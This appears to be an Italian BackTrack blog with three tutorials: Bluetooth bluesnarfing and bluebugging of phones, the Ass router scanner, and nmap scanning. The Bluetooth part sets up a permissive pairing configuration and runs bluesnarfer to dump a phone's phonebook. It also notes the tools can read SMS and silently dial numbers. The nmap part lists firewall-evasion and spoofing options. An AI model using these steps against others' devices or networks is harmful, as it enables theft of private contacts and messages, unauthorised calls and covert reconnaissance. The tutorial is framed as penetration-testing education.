Bluetooth Sniff with Bluebugger & Bluesnarfer

super-bluetooth-hack.gif

Ciao a tutti,

eccoci arrivati a descrivere un nuovo campo di lavoro per noi del «back|track~blog , stò parlando come da titolo del Bluetooth sniffer.

I tool che useremo sono il Bluebugger ed il Bluesnarfer.

Il Bluebugger è un prodotto della Codito.de , ossia il sito di Martin J. Muench developper di BackTrack.

Prima di comunciare è doveroso dirvi che ovviamente per provare/testare questo tutorial avete bisogno di un Bluetooth device regolarmente riconosciuto da BackTrack , per essere sicuri potete vedere su Google cosa è riconosciuto o meno dai sistemi basati su GNU/Linux in generale , oppure lasciate qualche commento e vediamo cosa riusciamo a fare , oppure ancora entrate in canale e chiedete.

Ma iniziamo il nostro lavoro…..

Appena entriamo in BT , inseriamo la nostra chiavetta usb-bluetooth , e vediamo subito se il dispositivo è riconosciuto dal sistema dando da konsole il comando:

hciconfig

vedremo subito se il dispositio è riconosciuto , dopodiché per attivarlo basta dare il comando:

hciconfig hci0 up

Questo perché il mio dispositivo è visto da BT come hci0 , (hci-zero) , ma finora non ho sentito di dispositivi bluetooth indicati da BT con sigle diverse.

Per essere sicuri che il vostro dispositivo stia lavorando date da konsole il comando:

hciconfig -a

Dovrebbe restituirvi tutta la configurazione del dispositivo.

Ora , in BT ci sono una serie di strumenti per l’ utilizzo in vario modo di connessioni bluetooth chiamati Bluez , e noi iniziamo con il Hcitool , e lo facciamo tramite un piccolo scanning , dando da konsole il comando:

hcitool scan hci0

Questo il risultato che a me restituisce BT dopo aver messo in connettività bluetooth il mio telefono cellulare:

[root@bt ~]$ hcitool scan hci0
Scanning …
00:15:B9:57:80:C0 HaCkLaB-PH

Se non vi vedete arrivare nessun risultato provate a dare il comando BTscanner , oppure ancora a lanciare il BTscanner da backtrck->RadioNetworkAnalisys->Bluetooth->…

Oppure ancora , suate sicuri dell’ attività del cellulare.

Questo è il risultato dato dal mio cellulare , ma in caso di un attacco , o meglio di uno sniffing sarebbe stata la stessa cosa , il sistema mi avrebbe restituito tutti i MacAddress ,(BD) , che avevano il bluetooth attivato , e vi assicuro che provando in una casa isolata non c’é scampo , ma se vi mettete in un aeroporto in una stazione o in un luogo del genere potete immaginare voi lo sniffing che un “malintenzionato” potrebbe fare.

Ecco infatti appena utilizziamo un altro tool , l’ sdptool , cosa riusciamo a vedere nel dispositivo:

brigante ~HaCkLaB.WiFu # sdptool browse 00:15:B9:57:80:C0
Browsing 00:15:B9:57:80:C0 …
Service Name: QC Voice Gateway
Service RecHandle: 0x10000
Service Class ID List:
“Headset Audio Gateway” (0x1112)
“Generic Audio” (0x1203)
Protocol Descriptor List:
“L2CAP” (0x0100)
“RFCOMM” (0x0003)
Channel: 3
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
“Headset” (0x1108)
Version: 0x0100

Service Name: QC Voice Gateway
Service RecHandle: 0x10001
Service Class ID List:
“Handfree Audio Gateway” (0x111f)
“Generic Audio” (0x1203)
Protocol Descriptor List:
“L2CAP” (0x0100)
“RFCOMM” (0x0003)
Channel: 4
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
“Handsfree” (0x111e)
Version: 0x0101

Service Name: FTP
Service RecHandle: 0x10002
Service Class ID List:
“OBEX File Transfer” (0x1106)
Protocol Descriptor List:
“L2CAP” (0x0100)
“RFCOMM” (0x0003)
Channel: 16
“OBEX” (0x0008)
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
“OBEX File Transfer” (0x1106)
Version: 0x0100

Service Name: OPP
Service RecHandle: 0x10003
Service Class ID List:
“OBEX Object Push” (0x1105)
Protocol Descriptor List:
“L2CAP” (0x0100)
“RFCOMM” (0x0003)
Channel: 17
“OBEX” (0x0008)
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
“OBEX Object Push” (0x1105)
Version: 0x0100

Service Name: Serial Port
Service RecHandle: 0x10004
Service Class ID List:
“Serial Port” (0x1101)
Protocol Descriptor List:
“L2CAP” (0x0100)
“RFCOMM” (0x0003)
Channel: 18
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
“Serial Port” (0x1101)

Service Name: Dial-up Networking
Service RecHandle: 0x10005
Service Class ID List:
“Dialup Networking” (0x1103)
Protocol Descriptor List:
“L2CAP” (0x0100)
“RFCOMM” (0x0003)
Channel: 8
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
“Dialup Networking” (0x1103)
Version: 0x0100

Bene , arrivati a questo punto voi direte , ma alla fine non è che hai ricavato molto , sono solo notizie riguardanti le porta di comunicazione , ma abbiate solo un pò di pazienza….

Tramite la konsole ed un editor di testi , nel mio caso Kate , apritevi il file di configurazione di Hdci , diamo quindi da konsole il comando:

kate /etc/bluetooth/hcid.conf

Al suo interno , andate a sostituire il tutto con le stringhe seguenti:

Sia chiaro che consiglio caldamente a tutti di farsi i propri backup , non rovinatevi la vita se non siete sicuri di ciò che fate.

Attenzione:
***

***</div>
<code>#
# HCI daemon configuration file.
#</code>

# HCId options
options {
# Automatically initialize new devices
autoinit yes;

# Security Manager mode
#   none - Security manager disabled
#   auto - Use local PIN for incoming connections
#   user - Always ask user for a PIN
#
security auto;

# Pairing mode
#   none  - Pairing disabled
#   multi - Allow pairing with already paired devices
#   once  - Pair once and deny successive attempts
pairing multi;

# Default PIN code for incoming connections
passkey "1234";
}

# Default settings for HCI devices
device {
# Local device name
#   %d - device id
#   %h - host name
name "device1";

# Local device class
class 0x000000;

# Default packet type
#pkt_type DH1,DM1,HV1;

# Inquiry and Page scan
iscan enable; pscan enable;

# Default link mode
#   none   - no specific policy
#   accept - always accept incoming connections
#   master - become master on incoming connections,
#            deny role switch on outgoing connections
lm accept,master;

# Default link policy
#   none    - no specific policy
#   rswitch - allow role switch
#   hold    - allow hold mode
#   sniff   - allow sniff mode
#   park    - allow park mode
lp rswitch,hold,sniff,park;
auth enable;
encrypt enable;
}
<p align="center">***

***

Ora è stato inserito come PIN , “1234” le 4 cifre internazionalmente di default sulla maggiorparte dei cellulari , ma tramite le opzioni a disposizione , e sempre in caso di un vero attacco , si sarebbe potuto pensare ad un attacco tramite brute-forcing. e comunque chi usa spesso il bluetooth non credo vogliastare sempre lì a digitare il PIN.

Fatto questo , salvate il tutto sovrascrivendo quindi totalmente il file di configurazione di Hdi , e date di nuovo da konsole per un nuovo UPil comando hciconfig -a

vi verrà restituito nuovamente il messaggio in stile con quello precedentemente ricavato tramite lo stesso comando , solo che noterete qualche piccolo cambiamento dato che , come potete vedere dalle righe stesse , abbiamo abilitato lo sniffing.

Ora facciamo il restart del dispositivo e ssociamovi i permessi ideali con i seguen ti comandi:

bash /etc/rc.d/rc.bluetooth restart

Dopodiché:

mknod -m 666 /dev/rfcomm0 c 216 3

mknod -m 666 /dev/rfcomm1 c 216 6

mknod -m 666 /dev/rfcomm2 c 216 7

Come potete benissimo notare non abbiamo fatto altro che creare prima ed associare poi tre connessioni che rispettivamente andranno ad occupare tre diversi canali , il primo RFCOMM0 nel canale 3 “DUN Dial UP” ; Il secondo RFCOMM1 attivo sulcanale 6 FTP , ed il terzo RFCOMM2 attivo nel canale 7 chiamato “OBEX push”.

Andiamo ora ad aggiungere i canali attivi al tool sdptool , da konsole quindi:

sdptool add –channel=3 DUN

sdptool add –channel=6 FTP

sdptool add –channel=7 OPUSH

Dopo aver configurato il tutto correttamente passiamo ora alla parte dello sniffing…

01_-_hacking.jpg

Per far lavorare i due programmi che ci servono per lo sniffing , non dobbiamo fare altro che lanciarli da Shell , oppure se si vuole ottenere direttamente la shell con il menù , vi basta lanciarli dal KdeMenuStart->BckTrack->Radio&NetworkAnalisys->Bluetooth->…..

brigante ~HaCkLaB.WiFu # bluebugger

bluebugger 0.1 ( MaJoMu | http://www.codito.de )
—————————————–

Usage: bluebugger [OPTIONS] -a <addr> [MODE]

-a <addr> = Bluetooth address of target

Options:
——–
-m <name> = Name to use when connecting (default: ”)
-d <device> = Device to use (default: ‘/dev/rfcomm’)
-c <channel> = Channelto use (default: 17)
-n = No device name lookup
-t <timeout> = Timeout in seconds for name lookup (default: 5)
-o <file> = Write output to <file>

Mode:
—–
info = Read Phone Info (default)
phonebook = Read Phonebook (default)
messages = Read SMS Messages (default)
dial <num> = Dial number
ATCMD = Custom Command (e.g. ‘+GMI’)

Note: Modes can be combined, e.g. ‘info phonebook +GMI’

* You have to set txxhe target address

Associamo al comando una nostra stringa , solo per fare una prova….

brigante ~HaCkLaB.WiFu # bluebugger -a 00:15:B9:57:80:C0 info

bluebugger 0.1 ( MaJoMu | http://www.codito.de )
—————————————–

Target Device: ’00:15:B9:57:80:C0′
Target Name: ‘HaCkLaB-PH’

tcgetattr failed: Input/output error
bt_rfcomm_config() failed
…done

Quì il mio telefono si blocca e mi restituisce l’ autorizzazione allo scambio di dialogo : (

Proviamo invece a vedere con il bluesnarfer cosa succede con un cellulare diverso (un pò più vecchiotto a dire il vero….).

Queste le opzioni del Bluesnarfer:

brigante ~HaCkLaB.WiFu # bluesnarfer
bluesnarfer: you must set bd_addr
bluesnarfer, version 0.1 –
usage: bluesnarfer [options] [ATCMD] -b bt_addr

ATCMD : valid AT+CMD (GSM EXTENSION)

TYPE : valid phonebook type ..
example : “DC” (dialed call list)
“SM” (SIM phonebook)
“RC” (recevied call list)
“XX” much more

-b bdaddr : bluetooth device address
-C chan : bluetooth rfcomm channel

-c ATCMD : custom action
-r N-M : read phonebook entry N to M
-w N-M : delete phonebook entry N to M
-f name : search “name” in phonebook address
-s TYPE : select phonebook memory storage
-l : list aviable phonebook memory storage
-i : device info


[root@bt ~]$ bluesnarfer -r -1-100 -b 00:79:S9:77:99:R0

+1 Angelo 049936XXXX

+2 Anta 049936XXXX

+3 AntonellaP 049936XXXX

+4 Giuseppe 049936XXXX

+5 Zio AXXXX 0XXX5XXX56

E la lista potrebbe continuare fino a nostro piacimento

In questo caso il Bluesnarfing ha funzionato benissimo , se eravamo dei malintenzionati , e se solo avessimo voluto avremmo potuto ricevere e cancellare tutta la lista di numeri che erano in rubrica sul telefono.

Le opzioni poi potete vederle benissimo , c’é dallo sniffing dei messaggi , fino al Dial-UP , ossia la possibilità di chiamare in quiet un qualsiasi numero di telefono utilizzando la linea del cellulare attaccato.

Capirete quindi in condizioni ideali che strumento possiamo avere a disposizione.

Oggi gli strumenti mediatici che usano il bluetooth sono moltissimi , non solo cellulari , ma palmari , stampanti , tutti gli strumenti che posso essere collegati ad un pc , e stando ai test che ho fatto , si riesce a trovare compatibilità e riuscita , almeno una volta su cinque.

Lo sniffing con dispositivi bluetooth è una cosa attraente ma anche molto pericolosa , ricordate che le tracce del segnale del vostro telefono sono monitorate quindi spero che non pensiate minimamente di trarre da questo tutorial notizie che possano servirvi a scopi illegali… ….come sempre , nessuno si prenderà responsabilità a riguardo.

Detto questo , in campo di telefonia come del resto riguarda l’ hardware in genere se si ha il mezzo giusto , ed in questo caso il nostro telefono cellulare , si possono arrivare a fare delle belle prove , ma a volte com’è successo a me, per configurare il dispositivo possono passare delle giornate.

Sto cercando di fare l’ UPload di un vecchio video realizzato con Audithor , e creato sempre dal team di remote-exploit , appena posso lo linko nella pagina dei video , in modo tale da poter rendere bene l’ idea.

Ciao a tutti e alla prossima.

La parte di configurazione del tutorial è stata presa da un thrade di Dr_GreeN sul Forums.Remote-exploit , l’ esperimento è nostro.

Annunci

Ass

phe.png

Ciao a tutti,

questo più che un articolo è un minitutorial , anche se mini non certo per l’ importanza del tool in questione.

Il tool di cui scriviamo oggi è l’ Ass

Ass è uno strumento da riga di comando che è inserito in backtrack nella sezione “InformationGathering” , e precisamente nella directory “ROUTER” , ossia quella directory che contiene tutti i tool che analizzano e ricevono o estraggono informazioni da tutti i tipi di router.

Ass è un tool leggero e versatile , gode anche lui di tutte le opozioni necessarie ai nostri bisogni e sicuramente è molto veloce.

La società che sviluppa Ass è la Phenoelit di cui , dati i tool della società inseriti in backtrack , parleremo sicuramente di nuovo.

La sigla Ass , sta per “Anonymous System Scanner”.

Ass è uno strumento che è designado a riuscire a trovare tutte le caratteristiche di un qualsiasi router connesso ad una rete , e lo fà tramite una vera e propria costruzione di pacchetti.

Ass tra le sue opzioni contiene lo Spoofing dell’ IP sorgente , la modalità Promiscua e supporta vari protocolli di radiocomunicazione tra cui: IRDP, IGRP, EIGRP, RIPv1, RIPv2, CDP, HSRP and OSPF.

Supporta la modalità attiva (invio degli “HELLO” , esegue la composizione di pacchetti e seleziona le informazioni da richiedere al router) , e la modalità passiva , (tramite invio/ricezione in Multicast) , ed è un tool che anche se non in molti casi , si può rivelare estremamente utile in casi specifici.

La composizione della stringa per utilizzare Ass è del tipo seguente:

ass [-v[v[v]]] -i <interface> [-ApcMs] [-P IER12]

Le opzioni di cui Ass gode sono le seguenti:

-i interfaccia di ascolto (eth0 – ath0 – wifi0 – rausb0)

-v modalità verbose
-A attiva la modalità scansione
-P <protocols> attivazione di vari protocolli supportati (usare come sempio: -P EIR12)
-M EIGRP scansionamento del sistema in multicast
-a <autonomous system>START
-b <autonomous system>STOP
-S <spoofed source IP>
-D <destination IP>
-p non esegue la modalità Promiscua (bad idea)
-c termina la procedura dopo la scansione
-T <packets per delay> invio di un determinato numero di pacchetti ad ogni periodo di tempo , calcolato in millisecondi , l’ opzione di default è 1 pacchetto al secondo.

Questo è il risultato di una prova fatta sempre nella mio piccolo Lab:

brigante ~HaCkLaB.WiFu # ass -vvv -i ath0 -P EIR12 -M -a -p -D 29.XXX.6.XX

ASS [Autonomous System Scanner] $Revision: 1.24 $
(c) 2k++ FX <fx@phenoelit.de>
Phenoelit (http://www.phenoelit.de)
IRPAS build XXXIX
passive listen … (hit Ctrl-C to finish)
… Packet …
IP
not me
… Packet …
IP
not me
… Packet …
IP
not me
… Packet …
IP
not me
… Packet …
IP
not me

Signal received.

>>>Results>>>
*** glibc detected *** ass: double free or corruption (!prev): 0x0805c1d0 ***
======= Backtrace: =========
/lib/libc.so.6[0xb7e5cc23]
/lib/libc.so.6(cfree+0x90)[0xb7e600f0]
ass[0x804f10f]
ass[0x8049d9d]
/lib/libc.so.6(__libc_start_main+0xd8)[0xb7e0adf8]
ass[0x80491f1]
======= Memory map: ========
08048000-0805b000 r-xp 00000000 08:04 2257032 /usr/local/bin/ass
0805b000-0805c000 rw-p 00013000 08:04 2257032 /usr/local/bin/ass
0805c000-0807d000 rw-p 0805c000 00:00 0 [heap]
b7c00000-b7c21000 rw-p b7c00000 00:00 0
b7c21000-b7d00000 —p b7c21000 00:00 0
b7df4000-b7df5000 rw-p b7df4000 00:00 0
b7df5000-b7f31000 r-xp 00000000 08:04 1455397 /lib/libc-2.5.so
b7f31000-b7f32000 r–p 0013c000 08:04 1455397 /lib/libc-2.5.so
b7f32000-b7f34000 rw-p 0013d000 08:04 1455397 /lib/libc-2.5.so
b7f34000-b7f37000 rw-p b7f34000 00:00 0
b7f45000-b7f4f000 r-xp 00000000 08:04 2194002 /usr/lib/libgcc_s.so.1
b7f4f000-b7f50000 rw-p 00009000 08:04 2194002 /usr/lib/libgcc_s.so.1
b7f50000-b7f52000 rw-p b7f50000 00:00 0
b7f52000-b7f6d000 r-xp 00000000 08:04 1455381 /lib/ld-2.5.so
b7f6d000-b7f6f000 rw-p 0001b000 08:04 1455381 /lib/ld-2.5.so
bf80c000-bf822000 rw-p bf80c000 00:00 0 [stack]
ffffe000-fffff000 r-xp 00000000 00:00 0 [vdso]
Aborted

E questo è tutto per descrivere Ass , un tool che si usa poco ma che nei casi specifici è insostituibile.

Ciao a tutti e alla prossima.

nMap -Network Mapping-

Con quest’ articolo introduciamo nel blog una nuova sezione , che anche se non del primo argomento si tratta , oggi vede la sua prima definizione vera.

La sezione di cui parlo è quella del Network Mapping , fondamentale per tutti coloro che conoscono e usano la BackTrack , e che racchiude in se , come tutte le altre sezioni del resto , molti tool , e di varia natura.

Con quest’ articolo non vogliamo introdurre e chiudere subito tutta la sezione del Network Mapping , abbiamo intenzione di trattare tutti gli argomenti , uno ad uno , e oggi iniziamo con il tool più famoso ed utilizzato….. l’ nMap.

insecurelogo-eye-90x168.gif

L’ nMap , è lo scanning forse più famoso , (a merito) , della rete.

Iniziamo con una intro generale e di definizione.

L’ nMap , ovvero “network Mapping” , è un prodotto del lavoro del gruppo di Insecure.org , che ha attraversato molti livelli , (intesi come versioni , attualmente alla 4.50) , ed è sempre stato giustamente considerato tra i migliori portscanner in circolazione.

L’ nMap è disponibile in vari formati , dall’ utilizzo tramite riga di comando , (più raccomandato ed utilizzato ovviamente) , in konsole , fino ad arrivare all’ interfccia grafica. È disponibile per tutte le distro GNU/Linux fino ad arrivare a MacHintosh e M$ Windows. Noi quì ovviamente faremo riferimento alle versioni attualmente in uso in BackTrack.

In BackTrack infatti l’ nMap è disponibile tramite konsole , dove basta digitare il comando nmap seguito dalle opzioni e dall’ indirizzo IP del target , e tramite interfaccia grafica , disponibile in KdeMenuStart–>BackTrack–>NetworkMapping–>All–>nMapFE

L’ nMap è uno scanner potentissimo , ed a renderlo tale è la sua affidabilità , la sua versatilità e la grande quantità di opzioni a disposizione , che mettono l’utente in condizioni tali da avere a disposizione uno strumento potente , all’ avanguardia e leggerissimo.

A testimonia della leggerezza e affidabilità dell’ nMap è già il fatto che lo stesso è inserito , proprio perché leggero , all’interno di altri programmi che necessitano di scanning , come ad esempio il Metasploit Framework.

Se si vuole una documentazione dettagliata sull’ nMap , vi basta digitare da konsole il comando:

nmap -h

in questo modo vi verranno elencate tutte le opzioni di cui l’ nMap gode.

Giusto per fare un esempio , passiamo ora ad una descrizione di uso dell’ nMap.

Lo scanning di rete può essere fatto in vari modi , a seconda delle nostre necessità effettueremo o meno determinate operazioni , elencare tutte le opzioni dell’ nMap sarebbe inutile , (chi vuole da konsole digiti: “nmap -h”) , siamo in BackTrack , e di conseguenza esamineremo l’utilizzo dell’ nMap durante una fase di attacco , e cioé:

come ottenere determinate informazioni utili al nostro attacco.

nmap_bnr_kyra2.gif

Gli attacchi che possiamo prendere come esempio sono molteplici , dal voler entrare abusivamente all’ interno di un server al voler violare la privacy di un normale utente , ricordando ovviamente che questo è come sempre un tutorial di prevenzione contro coloro che queste cose le fanno , e che quindi stiamo trattando un argomento che và preso come sempre per penetration test , (e non per lamer-test).

I siti che si trovano in giro per la rete sono sempre diversi tra loro , e per poterne attaccare uno , abbiamo bisogno di venire in nostro possesso di informazioni che possono permetterci di attaccare il sito in questione. La cosa che per prima ci serve è sapere ad esempio quali porte il sito ha aperte , oppure che tipo di O.S. usa , ed è quì che ci serviremo dell’ nMap.

Analizziamo però le opzioni necessarie al nostro scopo:

da konsole , dopo il comando nmap dobbiamo inserire delle opzioni , dopo o a seconda del caso , prima delle stesse opzioni , va inserito l’ IP dell’ host da esaminare/attacare , e possiamo farlo inserendo solo l’ IP del target oppure inserendo il percorso del file *.txt , di nome hosts.txt posizionato nel nostro Desktop e che contiene una serie di host da scannerizzare , inseriti nel file di testo uno sotto l’ altro come una wordlist e inserita nella konsole dopo l’ opzione -iL , come ad esempio nel seguente comando:

nmap -iL /root/Desktop/hosts.txt

il comando e le opzioni descritte con la riga sopra , diono all’ nMap di eseguire una normale scansione di tutti gli host contenuti nel file di nome host.txt , file che ripeto , è posizionato nel nostro Desktop.

Ed è solo la descrizione dello scanning ottenuto con l’ opzione -iL ,(alla lettera inputList), che fa parte di quelle opzioni del TARGET SPECIFICATION , ossia tutte quelle opzioni che servono all’ nMap per gestire i target , gli indirizzi IP da scannerizzare e le loro specifiche. Eccovi un esempio , (eseguito in locale sulla mia LAN):

***

brigante ~HaCkLaB.WiFu # nmap -iL /root/Desktop/hosts.txt

Starting Nmap 4.50 ( http://insecure.org ) at 2008-02-10 15:40 GMT
Interesting ports on XX.XXX.X.XX:
Not shown: 1704 closed ports
PORT STATE SERVICE
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
631/tcp open ipp
902/tcp open iss-realsecure-sensor
2049/tcp open nfs
5900/tcp open vnc
MAC Address: 00:02:72:61:7B:52 (CC&C Technologies)

All 1711 scanned ports on XX.XXX.7.XXare closed

Interesting ports on XX.XXX.XX.XXX:
Not shown: 1708 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:19:3E:A0:D8:25 (Pirelli Broadband Solutions)

Interesting ports on 29.XXX.7.XX:
Not shown: 1709 closed ports
PORT STATE SERVICE
23/tcp open telnet
646/tcp open unknown
MAC Address: 00:90:1A:42:19:10 (Unisphere Solutions)

Nmap done: 4 IP addresses (4 hosts up) scanned in 10.486 seconds

***

L’nMap , in questo caso , ci elenca tutte le scansioni una dopo l’ altra , e nella mia Lan essendoci connessi 4 macchine , ecco il risultato.

Come per la serie di opzioni che riguardano l’ host detection ci sono altre che riguardano il PORT DETECTION , che ovviamente possono ritornarci utili nel momento in cui siamo già a conoscenza di determinate informazioni.

Un’ opzione può essere ad esempio -r , ovvero la – randomize ,(in questo caso il trattino “-” sta a significare il segno meno , della sottrazione), che farà in modo che l’ nMap esegua una scansione di porte in modo ricorsivo , una porta dopo l’altra in ordine numerico. Oppure è degna di nota anche l’ opzione -p , che permette all’ nMap di eseguire una scansione di determinate porte , senza andare quindi a scannerizzare porte a noi non necessarie , ma ripeto che sono sempre informazioni che la maggiorparte delle volte viene usata perché si è già a conoscenza di informazioni di scanning già effettuati e poi in tutti i casi l’ nMap è sempre stato molto veloce come scanning , e a meno che non si debbano scavlcare firewall e altre cosette , sono opzioni poco usate.

Una semplice e veloce scansione può essere però effettuata anche senza apporre delle opzioni , scrivendo quindi dopo il comando nmap l’ IP target , come nel seguente esempio , (sempre in locale sulla mia LAN):

***

brigante ~HaCkLaB.WiFu # nmap 29.XXX.6.XX

Starting Nmap 4.50 ( http://insecure.org ) at 2008-02-10 15:27 GMT
Interesting ports on XX.XXX.7.XX:
Not shown: 1708 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:X9:XX:A0XX:25 (Pirelli Broadband Solutions)

***

 

L’ nMap agisce tramite delle vere e proprie tecniche di scanning ,(SCAN TECHNIQUES), tecniche che possiamo scegliere tramite altre opzioni da apporre alla riga sempre prima dell’ indirizzo IP del nostro target , prima perché appunto descrivono la tecnica da applicare alla scansione del target. Un esempio possiamo farlo con l’ opzione -sS.

L’opzione -sS , è tra le più usate , per il semplice fatto che in pochi secondi fa eseguire all’ nMap una scansione accurata di migliaia di porte , anche su più network.

Una serie di opzioni che caratterizza l’ nMap , e che è a mio avviso decisiva per il pentesting è la serie di opzioni dedicate all’ OS DETECTION , ovvero la scoperta dei sistemi operativi che sono attualmente in uso su di un determinato server , e capirete bene voi se è o no essenziale per un attacco.

La stessa scansione che ho effettuato sulla mia rete Lan prima , la ripeto ora con l’opzione appena descritta per l’ OS detection , quindi:

***

brigante ~HaCkLaB.WiFu # nmap -O 29.XXX.6.XX


Starting Nmap 4.50 ( http://insecure.org ) at 2008-02-10 21:18 GMT
Interesting ports on 29.XXX.6.XX:
Not shown: 1709 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
MAC Address: 00:02:72:61:7B:52 (CC&C Technologies)
Device type: general purpose
Running: Microsoft Windows XP|2003
OS details: Microsoft Windows XP SP2 or Windows Server 2003 SP0/SP1
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.477 seconds

***
Un’ altra opzione importante per quanto riguarda la serie “detection”, può essere quella del detection OS & Versione , dell’ opzione -A , ho fatto un esempio , come viene consigliato per fare delle prove dagli stessi developper dell’ nMap , sul loro host e questo è stato il risultato:
***
brigante ~HaCkLaB.WiFu # nmap -v -A scanme.nmap.org

Starting Nmap 4.50 ( http://insecure.org ) at 2008-02-10 22:10 GMT
Initiating Ping Scan at 22:10
Scanning 205.217.153.62 [2 ports]
Completed Ping Scan at 22:10, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:10
Completed Parallel DNS resolution of 1 host. at 22:10, 0.36s elapsed
Initiating SYN Stealth Scan at 22:10
Scanning scanme.nmap.org (205.217.153.62) [1711 ports]
Discovered open port 53/tcp on 205.217.153.62
Discovered open port 80/tcp on 205.217.153.62
Discovered open port 22/tcp on 205.217.153.62
SYN Stealth Scan Timing: About 13.62% done; ETC: 22:14 (0:03:12 remaining)
Increasing send delay for 205.217.153.62 from 0 to 5 due to 11 out of 20 dropped probes since last increase.
Completed SYN Stealth Scan at 22:12, 144.43s elapsed (1711 total ports)
Initiating Service scan at 22:12
Scanning 3 services on scanme.nmap.org (205.217.153.62)
Completed Service scan at 22:13, 5.01s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against scanme.nmap.org (205.217.153.62)
Retrying OS detection (try #2) against scanme.nmap.org (205.217.153.62)
Initiating Traceroute at 22:13
205.217.153.62: guessing hop distance at 14
Completed Traceroute at 22:13, 30.72s elapsed
Initiating Parallel DNS resolution of 38 hosts. at 22:13
Completed Parallel DNS resolution of 38 hosts. at 22:13, 2.71s elapsed
SCRIPT ENGINE: Initiating script scanning.
Initiating SCRIPT ENGINE at 22:13
Completed SCRIPT ENGINE at 22:14, 46.77s elapsed
Host scanme.nmap.org (205.217.153.62) appears to be up … good.
Interesting ports on scanme.nmap.org (205.217.153.62):
Not shown: 1707 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh?
25/tcp closed smtp
53/tcp open domain?
80/tcp open http?
|_ HTML title: Authentication required!
| HTTP Auth: HTTP Service requires authentication
|_ Auth type: Basic, realm = Nmap-Writers Content
Device type: specialized
Running (JUST GUESSING) : Raritan embedded (85%)
Aggressive OS guesses: Raritan Dominion KX II KVM switch (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime: 6.732 days (since Mon Feb 4 04:39:56 2008)
TCP Sequence Prediction: Difficulty=198 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 37.87 29.230.0.1
2 39.12 10.5.105.138
3 39.14 10.251.155.201
4 39.22 10.251.150.22
5 38.38 10.251.151.1
6 38.35 10.251.155.186
7 39.04 10.5.4.25
8 38.88 10.254.2.13
9 38.45 10.254.2.74
10 39.84 10.254.1.121
11 42.06 10.254.9.17
12 42.78 10.254.9.198
13 45.92 89.96.200.158
14 76.75 26.26.27.17
15 68.74 26.26.27.25
16 69.67 26.26.27.6
17 67.95 89.96.200.13
18 69.80 81-208-50-114.ip.fastwebnet.it (81.208.50.114)
19 80.71 po0-0.core01.str01.atlas.cogentco.com (130.117.1.113)
20 82.01 po3-0.core01.fra03.atlas.cogentco.com (130.117.0.217)
21 172.87 po15-0.core01.par02.atlas.cogentco.com (130.117.0.18)
22 184.90 po13-0.core01.par01.atlas.cogentco.com (130.117.1.137)
23 171.89 te2-3.mpd02.par01.atlas.cogentco.com (130.117.2.50)
24 …
25 170.33 te8-1.ccr02.dca01.atlas.cogentco.com (154.54.2.194)
26 169.95 gi1-0-0.core01.dca01.atlas.cogentco.com (154.54.3.157)
27 167.81 po15-0.core02.dca01.atlas.cogentco.com (66.28.4.22)
28 166.68 po6-0.core01.jfk02.atlas.cogentco.com (66.28.4.82)
29 174.13 po15-0.core02.jfk02.atlas.cogentco.com (66.28.4.14)
30 210.83 po12-0.core01.mci01.atlas.cogentco.com (154.54.3.202)
31 305.93 po5-0.core01.den01.atlas.cogentco.com (66.28.4.29)
32 234.94 po14-0.core01.smf01.atlas.cogentco.com (66.28.4.130)
33 242.31 po4-0.core02.sfo01.atlas.cogentco.com (154.54.1.253)
34 237.00 po15-0.core01.sfo01.atlas.cogentco.com (66.28.4.69)
35 241.11 po4-0.core01.sjc01.atlas.cogentco.com (66.28.4.94)
36 243.87 vl3523.na01.b020462-1.sjc01.atlas.cogentco.com (38.112.39.114)
37 271.89 silicon-valley-colo.demarc.cogentco.com (38.104.134.30)
38 269.40 64.13.128.194
39 265.54 scanme.nmap.org (205.217.153.62)
Read data files from: /usr/local/share/nmap
OS and Service detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 240.123 seconds
Raw packets sent: 3533 (159.002KB) | Rcvd: 882 (67.125KB)
***
Dall’ enorme quantità di informazioni possiamo vedre che l’ opzione -A , è un’ opzione un pò particolare infatti la A stà per Aggressive , (MISC options), che esegue appunto una scansione aggressiva dell’ host , e lo fà abilitando con una sola opzione -A , l’ OS detection (-O), il version scanning (-sV), e lo script scanning (-sC) ainsieme al traceroute (--traceroute), capirete quindi voi l’importanza di questa opzione che ne racchiude ben 4.
Come possiamo vedere dalle diversità , le scansioni hanno dato risultati ben diversi , e per effettuare , giusto per fare un esempio , un attacco con il framework Metasploit , possiamo vedere l’ importanza dell’ opzione -O da aggiungere alla riga dell’ nMap , che ci ha restituito dettagliatamente l’ O.S. che usa il nostro target.
Un’ altra serie di opzioni molto importante in alcuni casi è quella del FIREWALL/IDS EVASION AND SPOOFING , che come potete capire dalle parole che la compongono , è una serie di opzioni di cui l’ nMap gode e che ci permette di evadere ai controlli di firewall che sono installati sugli O.S. di siti o target in genere. Le opzioni che la compongono sono una decina , elenchiamone solo qualcuna:
********
-S , che fa lo spoofing dell’ IP sorgente (che effettua lo scanning)
-f , che effettua uno scanning con pacchetti fragmentati che rendono il ping quindi frammentato
-spoof-mac , che effettua lo spoofing del nostro MACaddress
********
